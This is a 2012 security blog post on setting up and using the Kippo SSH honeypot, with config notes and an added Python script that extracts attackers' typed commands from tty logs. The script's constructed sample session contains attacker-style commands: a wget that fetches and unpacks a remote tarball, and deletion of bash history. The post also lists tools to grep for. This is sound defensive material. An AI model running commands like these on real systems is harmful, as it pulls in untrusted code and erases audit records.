TekTip ep11 - Kippo SSH Honeypot
Saturday, October 13, 2012 at 11:30PM
Description: Kippo is a medium-interaction SSH honeypot designed to log brute-force attacks and, most importantly, the entire shell interaction performed by the attacker. The shell and filesystem the attacker sees are emulated in Python rather than real, so a successful "login" never gives code execution on the host.
Uses: Alert to potential threats, watch how attackers operate once they have a shell, gather the exploits and malware they download.
Installation:
http://bruteforce.gr/honeybox : HoneyBox is a distro that bundles numerous honeypot packages on a single box. It also preconfigures the honeypots to use several of the enhancements BruteForce Lab has created for them.
*If at home, to make the honeypot reachable from the internet you will need to enable port forwarding on your modem/router, and potentially in your virtual machine software as well. Kippo listens on TCP 2222 by default (ssh_port in kippo.cfg) so that it can run as an unprivileged user, so forward or redirect external port 22 to it; a honeypot reachable only on 2222 sees far less brute-force traffic. If the host also runs a real sshd, move that to another port first, and keep the honeypot on an isolated network segment: the shell is emulated, but the files attackers fetch with wget land in kippo/dl/ and are real malware.
Usage:
kippo/kippo.cfg : Main configuration file
kippo/honeyfs : This is the fake filesystem that will be presented to the attacker (hostname, /etc/passwd, /proc contents and so on). Customize it so the box does not look like a stock Kippo install.
kippo/data/userdb.txt : This file allows us to modify the username and password combinations that will work when attackers attempt to log into the honeypot. One entry per line in the form username:uid:password; the default file contains only root:0:123456, so add a few of the passwords you see being brute-forced.
kippo/log/tty/ : In this directory you will find the logs for each session established by attackers, one file per session named by timestamp. They are binary ttylog recordings, not text, so replay them with playlog.py rather than cat.
./start.sh
- starts Kippo under twistd in the background; the daemon log goes to kippo/log/kippo.log.
kippo/utils/playlog.py : Replay an attacker session from the kippo/log/tty directory.
Usage: playlog.py [-bfhi] [-m secs] [-w file] <tty-log-file>
  -f            keep trying to read the log until it's closed
  -m <seconds>  maximum delay in seconds, to avoid boredom or fast-forward to the end (default is 3.0)
  -i            show the input stream instead of output
  -b            show both input and output streams
  -c            colorify the output stream based on what streams are being received
  -h            display this help
e.g.
~/kippo/utils/playlog.py 20121012-115031-8544.log
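Replaying sessions one at a time is fine for a video, but once the honeypot has been up for a week you want the typed commands from every file in kippo/log/tty/ without sitting through the delays. The script below is an added example, not code from the original post or from the Kippo project. It assumes the record layout written by kippo/ttylog.py and read by playlog.py: a 24-byte header packed as '<iLiiLL' (op, tty, length, direction, sec, usec) followed by length bytes of data, with OP_WRITE = 3 and direction TYPE_INPUT = 1 for the attacker's raw keystrokes and TYPE_OUTPUT = 2 for what the honeypot sent back. It reads only the input stream (the same data playlog.py shows with -i), applies backspaces, and splits on Enter, so a typo the attacker corrected is reported once. The sample session is constructed inline so the script runs offline; the names write_record, iter_records, attacker_commands and session_summary are this example's own.

```python
"""Pull the attacker's typed commands out of a Kippo tty log.

Added example, not code from the original post or from Kippo. Assumes the
record layout of kippo/ttylog.py: struct.pack('<iLiiLL', op, tty, length,
direction, sec, usec) followed by `length` bytes of data.
"""
import struct
import sys

HEADER = "<iLiiLL"
HEADER_SIZE = struct.calcsize(HEADER)  # 24 bytes
OP_OPEN, OP_CLOSE, OP_WRITE, OP_EXEC = 1, 2, 3, 4
TYPE_INPUT, TYPE_OUTPUT, TYPE_INTERACT = 1, 2, 3


def write_record(buf, op, direction, stamp, data=b""):
    """Append one record to a bytearray, the way ttylog.ttylog_write does."""
    sec = int(stamp)
    usec = int(1000000 * (stamp - sec))
    buf.extend(struct.pack(HEADER, op, 0, len(data), direction, sec, usec))
    buf.extend(data)


def iter_records(blob):
    """Yield (op, tty, direction, timestamp, data) for every complete record."""
    off = 0
    while off + HEADER_SIZE <= len(blob):
        op, tty, length, direction, sec, usec = struct.unpack_from(HEADER, blob, off)
        off += HEADER_SIZE
        data = bytes(blob[off:off + length])
        if len(data) < length:  # truncated tail: session still open or log cut short
            break
        off += length
        yield op, tty, direction, sec + usec / 1e6, data


def attacker_commands(blob):
    """Return the command lines the attacker sent, in order.

    Only TYPE_INPUT data is used, so the honeypot's echo and fake command
    output are ignored. Backspace (0x7f or 0x08) is applied, Enter (CR or LF)
    ends a line, and a partial line at the end of the log is kept.
    """
    commands, line = [], bytearray()
    for op, _tty, direction, _ts, data in iter_records(blob):
        if op != OP_WRITE or direction != TYPE_INPUT:
            continue
        for b in data:
            if b in (0x7f, 0x08):
                if line:
                    line.pop()
            elif b in (0x0d, 0x0a):
                if line:
                    commands.append(line.decode("utf-8", "replace"))
                line = bytearray()
            else:
                line.append(b)
    if line:
        commands.append(line.decode("utf-8", "replace"))
    return commands


def session_summary(blob):
    """Session length and bytes per direction: a quick triage view."""
    first = last = None
    counts = {TYPE_INPUT: 0, TYPE_OUTPUT: 0}
    for op, _tty, direction, ts, data in iter_records(blob):
        first = ts if first is None else first
        last = ts
        if op == OP_WRITE:
            counts[direction] = counts.get(direction, 0) + len(data)
    duration = 0.0 if first is None else last - first
    return {"duration": round(duration, 3),
            "input_bytes": counts[TYPE_INPUT],
            "output_bytes": counts[TYPE_OUTPUT]}


def build_sample_log():
    """Constructed session (not a real capture): recon, a download, then an
    attempt to cover tracks. Note the backspace-corrected typo in 'uname -a'."""
    buf = bytearray()
    t = 1350042631.0  # arbitrary epoch stamp
    write_record(buf, OP_OPEN, 0, t)
    write_record(buf, OP_WRITE, TYPE_OUTPUT, t + 0.1, b"nas3:~# ")
    write_record(buf, OP_WRITE, TYPE_INPUT, t + 2.0, b"w\r")
    write_record(buf, OP_WRITE, TYPE_OUTPUT, t + 2.1, b"w\r\n 11:30:33 up 14 days\r\nnas3:~# ")
    write_record(buf, OP_WRITE, TYPE_INPUT, t + 5.0, b"uname -x\x7fa\r")
    write_record(buf, OP_WRITE, TYPE_OUTPUT, t + 5.1, b"uname -a\r\nLinux nas3 2.6.26-2-686\r\nnas3:~# ")
    write_record(buf, OP_WRITE, TYPE_INPUT, t + 20.0, b"wget http://198.51.100.7/x.tgz; tar xzf x.tgz\r\n")
    write_record(buf, OP_WRITE, TYPE_INPUT, t + 41.5, b"rm -rf ~/.bash_history\r")
    write_record(buf, OP_CLOSE, 0, t + 42.0)
    return bytes(buf)


if __name__ == "__main__":
    # Pass a file from kippo/log/tty/ as the first argument, or run with no
    # arguments to parse the constructed sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_log()
    print(session_summary(blob))
    for cmd in attacker_commands(blob):
        print(cmd)
```

Run it over every file in the tty directory and you get one command list per session, which is what you want to grep for wget, curl, perl or chmod before deciding which sessions deserve a full playlog.py replay. Passwords typed at fake su or sudo prompts are part of the input stream too, so treat the output as sensitive data, not just logs.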
1aN0rmus@tekdefense.com
tagged 1aN0rmus, Bruteforce lab, Cyber, Honeybox, Kippo, Medium Interactive, Network Security, brute force, honeypot, shell, ssh, tekdefense in TekTip
Reader Comments (1)
Hello Ian. Great video and thanks for the mention about BruteForce Lab. You should also explore the MySQL logging capabilities of Kippo (check: http://bruteforce.gr/logging-kippo-events-using-mysql-db.html), so you can visualize the results with a tool like Kippo-Graph. You'll find it interesting, I assure you. About the HoneyBox project, it's renamed to HoneyDrive (just FYI) and I plan to update it very soon with new software, or create a desktop version (lightweight, probably xubuntu or lubuntu based) so GUI tools can be included as well. Let me know if you have any suggestions, etc. Have a nice day.